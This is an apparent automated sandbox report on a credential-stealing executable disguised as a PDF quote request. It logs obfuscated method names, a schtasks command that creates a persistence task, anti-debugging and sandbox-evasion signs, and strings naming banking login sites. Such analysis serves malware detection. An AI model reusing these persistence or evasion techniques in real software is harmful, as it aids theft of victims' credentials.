                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, sqSHy0TDxnUit1Vs6T.cs High entropy of concatenated method names: 'o34nDWFeG6', 'mnKnIshPkZ', 'W9dnHjvQM4', 'slUnPmG4an', 'ebLnNnLih4', 'g0rnS0Imkx', 'Q6UnjV0lik', 'AkEnW00net', 'ER0nK4PN2c', 'CSMnaHPffh'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, eg2N9YjocGCOskKUe5.cs High entropy of concatenated method names: 'TNXFxt632v', 'lroFQBRvEA', 'N16FsKmiBr', 'jQosAMk86v', 'RkOszCnoW7', 'w1HFupmEed', 'XoKFvckIiO', 'iuZFbb9pgc', 'c06FJaeUBQ', 'WPaF0Cvwg2'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, cgFh7tKE3LhbGRybWr.cs High entropy of concatenated method names: 'mrjFop23OO', 'WDHFG4ivDd', 'ILIFh0a1ZN', 'PqFFciJpMk', 'PfcFepcBEg', 'h1sFZfWYIu', 'OEDFtdFjYt', 'lQnF7XgUxi', 'JxRFLcktFL', 'WhgF2eqYHJ'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, Hr7caELxU2fyHysv8H.cs High entropy of concatenated method names: 'pOWQcfe4LZ', 'YbvQZjebnD', 'r03Q7gQ0Uq', 'vhBQLfTlxU', 'hBtQ89lTZj', 'IKpQfxSZmr', 'dQ1QX9CNAE', 'mu9Q46bOrX', 'sf4QnwQNxM', 'otxQVkotb9'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, OwWfsDyt1nsMMbKb4J.cs High entropy of concatenated method names: 'd8DXMv5lMO', 'SQwXmyoUvk', 'ToString', 'dSPXxyA76s', 'vJSXrOaYUe', 'iBYXQx6gJc', 'qBKXC51dJS', 'V11XshldkJ', 'z1lXFQrxif', 'BpnX9djIuw'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, TbPBtyAXJCZogp07Aj.cs High entropy of concatenated method names: 'ecqVQodPma', 'Aq0VCBKPC8', 'm4yVslvTeX', 'VuRVFPVgTW', 'xeRVnlx8mm', 'htRV9wGgmU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, QZgRRnzdnwFIMTT8ri.cs High entropy of concatenated method names: 'MWtVZTacaV', 'roEV7ahFS3', 'vOgVL6dAc4', 'sd3VDFLsCe', 'rbjVIknd2w', 'g6PVPlOALU', 'gGkVN4GDNh', 'iG9Vk0neWi', 'bcQVoHWroT', 'tVqVGlZurR'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, lZQDKxbd8a3m5yw9bL.cs High entropy of concatenated method names: 'SENh4W9QR', 'fYxcg8RQg', 'rNIZTrZBw', 'NAjtTEBlZ', 'swgLGckJo', 'N4P2p242O', 'e7HhJGZ15M0k2YXFNl', 'lCPgJRTlIAQSU3eIFT', 'J824ykg3l', 'XpaVhE1F7'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, Ailu8G9t2evw62NJXl.cs High entropy of concatenated method names: 'hA4JRhcqmu', 'P8RJxHTJRH', 'qCbJrw4ZrD', 'OeyJQvaDvK', 'NriJCaf6xy', 'oWNJsibvFu', 'KcbJFS36Yo', 'aw1J9dBjmr', 'gv2JYMnyVn', 'BXCJMQD0f1'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, ALXjfkrylHWxb186ed.cs High entropy of concatenated method names: 'Dispose', 'yXNvTN19Fm', 'hctbIse7g9', 'x17eQI355w', 'jpXvAYP6iE', 'wvvvzR4exR', 'ProcessDialogKey', 'fpnbuqSHy0', 'FxnbvUit1V', 'i6TbbybPBt'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, FS0OkP0e6k09q0CE9U.cs High entropy of concatenated method names: 'l4HvF87Xg7', 'cWFv9JPkXQ', 'vxUvM2fyHy', 'iv8vmHaEA2', 'Rtlv8NBi5K', 'TQCvfPn968', 'YJsfU548fWqkgMQl9R', 'D6eWfJv6rJRpHkqcjL', 'IuQvvc695b', 'APXvJyMcEl'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, FhKOe8wV3GXNN19Fms.cs High entropy of concatenated method names: 'RTwn8j2Wf2', 'lmFnXl6K6x', 'lnHnnXjLGp', 'NOfn6XgG1p', 'zYPnlMYpNE', 'VpenkdReHr', 'Dispose', 'XjU4x0K4S1', 'anE4rk4WaT', 'B2m4QJk4PH'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, NEA2ti2eZaBjydtlNB.cs High entropy of concatenated method names: 'Y1cCe5VBg3', 'uUjCtwDnGV', 'fd9QHmnfep', 'XiqQPFcw5p', 'tNPQNgoJ1Z', 'v8mQSuNMU7', 'PrEQjwgGmR', 'MWDQWrs9kB', 'zipQKWtWBx', 's91Qa2yx7R'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, RMB1Wp3sDbL6snkLuD.cs High entropy of concatenated method names: 'ToString', 'm0yfigQR4b', 'b3LfImuoG4', 'TIGfHMe8x1', 'Nn0fPtfFxV', 'JwQfNmwIMU', 'lMYfSGRKfA', 'LIofjrT2Ue', 'YvsfWFlMVh', 'pqOfKZIABX'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, KXhWqrIFpC3aTyFrCv.cs High entropy of concatenated method names: 'TwNKhvufhLLHAAyKwce', 'pDoQXLuqLvAuUDTTjS3', 'txPs4faIKe', 'c9JsnDP08m', 'GPYsVOE5Qc', 'YVCatcuxWt9BmWEfrbU', 'QHdgkCuhS8nTcYwP1JR'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, H87Xg77JWFJPkXQfOh.cs High entropy of concatenated method names: 'h9GrUbJS9U', 'KEZrd0hjgK', 'yc3r3kxX6D', 's09ryAq8eS', 'o9ur54gtjJ', 'HHDrp67Aes', 'EWUrwceUJf', 'HJdrqiWX1p', 'K4nrTaEEdg', 'kNSrALAfjB'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, fYM5l4vvPkQmv6DEe7j.cs High entropy of concatenated method names: 'wKEVAdqKQl', 'SNPVznf5ST', 'bIL6u0JCqZ', 'p2j6vkbRWb', 'A3w6bBw9Xe', 'FJF6JrUDbY', 'UFd60tONPV', 'gaM6RuLVJQ', 'uhb6xekieF', 'xLc6rPm3Gu'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, dnWL9Dv0TNdbK1I4b3U.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GCcBnXIflm', 'EdZBV1jKJo', 'S3CB6SAcVF', 'txFBBFiQv4', 'DxOBlXDCQZ', 'OR4BEBOcVn', 'TjvBk8II90'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, ftiOZOvudvtoVZOhMnR.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EatVi6SCs2', 'qdfVOpY8nO', 'DLEV1mdc1B', 'ellVU8NnSm', 'PXDVdKGMvS', 'bJ7V3uwq9x', 'W5kVyS2pe4'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, O5KyQCDPn9681CloIh.cs High entropy of concatenated method names: 'E3ZsRGgE4w', 'nxJsraBc9w', 'EoMsC3tIgn', 'yvksF6mVxW', 'TrVs9kiNNt', 'rF1C5W0AoS', 'Ka3CpdD427', 'k7uCwxpoOV', 'IUbCqTROHb', 'M7kCT4Yba9'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, cAQQjuUkVRdVJ9Gdhm.cs High entropy of concatenated method names: 'G908aZYuIq', 'LMm8OvhH1w', 'wW38UxqFoN', 'k748dnZbc2', 'GCC8IA8mfP', 'TtA8H38IgQ', 'RIb8Pksi9V', 'hUH8NaUmbC', 'U6c8SBybOA', 'BE08jsIfSX'
                Source: 0.2.NEW.RFQ00876.pdf.exe.44465d0.5.raw.unpack, ovs4HF1taliex9VHSE.cs High entropy of concatenated method names: 'dCtg7C40Dq', 'xKogLPFdDA', 'A18gDguFcN', 'J1RgIOUroY', 'el4gPyepHM', 'WP4gNDymVD', 'nuOgj1Try0', 'Ip0gWQL3gO', 'dulgahnuYa', 'TZogiH8ScD'
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe File created: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe

                Boot Survival

                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msinfo32.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msinfo32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: NEW.RFQ00876.pdf.exe PID: 6360, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RAangyFeHdZLco.exe PID: 7856, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\msinfo32.exe | API/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Memory allocated: 1B00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Memory allocated: 3350000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Memory allocated: 5350000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Memory allocated: 9000000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Memory allocated: A000000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Memory allocated: A1F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Memory allocated: B1F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Memory allocated: B60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Memory allocated: 26E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Memory allocated: 46E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Memory allocated: 8600000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Memory allocated: 7100000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Memory allocated: 9600000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Memory allocated: A600000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0189096E rdtsc
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7229
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 877
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8734
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 772
                Source: C:\Windows\SysWOW64\msinfo32.exe | Window / User API: threadDelayed 1339
                Source: C:\Windows\SysWOW64\msinfo32.exe | Window / User API: threadDelayed 8634
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | API coverage: 0.8 %
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | API coverage: 0.3 %
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe TID: 7148 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6328 | Thread sleep count: 7229 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 820 | Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5416 | Thread sleep count: 877 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6392 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340 | Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe TID: 7876 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 7360 | Thread sleep count: 1339 > 30
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 7360 | Thread sleep time: -2678000s >= -30000s
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 7360 | Thread sleep count: 8634 > 30
                Source: C:\Windows\SysWOW64\msinfo32.exe TID: 7360 | Thread sleep time: -17268000s >= -30000s
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe TID: 5364 | Thread sleep time: -90000s >= -30000s
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe TID: 5364 | Thread sleep time: -49500s >= -30000s
                Source: C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe TID: 5364 | Thread sleep time: -37000s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\msinfo32.exe | Last function: Thread delayed
                Source: 00255Of2.26.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 00255Of2.26.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 00255Of2.26.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 00255Of2.26.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 00255Of2.26.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 00255Of2.26.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: 00255Of2.26.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 00255Of2.26.dr | Binary or memory string: AMC password management pageVMware20,11696492231
                Source: aegBDZrMeWOlT.exe, 0000001B.00000002.3721511741.000000000106F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                Source: 00255Of2.26.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 00255Of2.26.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 00255Of2.26.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 00255Of2.26.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 00255Of2.26.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 00255Of2.26.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 00255Of2.26.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 00255Of2.26.dr | Binary or memory string: discord.comVMware20,11696492231f
                Source: firefox.exe, 0000001D.00000002.1772191232.00000252A0BFC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: msinfo32.exe, 0000001A.00000002.3718631099.0000000002E91000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD'cy
                Source: 00255Of2.26.dr | Binary or memory string: global block list test formVMware20,11696492231
                Source: 00255Of2.26.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: 00255Of2.26.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 00255Of2.26.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 00255Of2.26.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 00255Of2.26.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 00255Of2.26.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: 00255Of2.26.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 00255Of2.26.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 00255Of2.26.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 00255Of2.26.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 00255Of2.26.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 00255Of2.26.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 00255Of2.26.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 00255Of2.26.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\msinfo32.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0189096E rdtsc
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_00417BA3 LdrLoadDll
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01890185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018F4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0184A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0190C188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_019161C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018CE1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018CE1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018801F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_019261E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01910115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018FA118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018FA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01880124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018E4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018E4144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01856154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0184C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018E8158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0185208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018E80A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_019160B8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_019160B8 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D20DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0184A0E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018580E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D60E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0184C0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018920F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D4000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018F2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0186E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0184A020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0184C020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018E6030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01852050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D6050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0187C073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0187438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0184E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01848397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0185A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018583C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D63C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018F43D4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0190C3CD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018603E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0186E3F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018863FF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0188A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0184C310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_01870310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0191A352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018F8350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018F437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0188E284 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D0283 mov eax, dword ptr fs:[00000030h]15_2_018D0283
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D0283 mov eax, dword ptr fs:[00000030h]15_2_018D0283
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D0283 mov eax, dword ptr fs:[00000030h]15_2_018D0283
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018602A0 mov eax, dword ptr fs:[00000030h]15_2_018602A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018602A0 mov eax, dword ptr fs:[00000030h]15_2_018602A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E62A0 mov eax, dword ptr fs:[00000030h]15_2_018E62A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E62A0 mov ecx, dword ptr fs:[00000030h]15_2_018E62A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E62A0 mov eax, dword ptr fs:[00000030h]15_2_018E62A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E62A0 mov eax, dword ptr fs:[00000030h]15_2_018E62A0
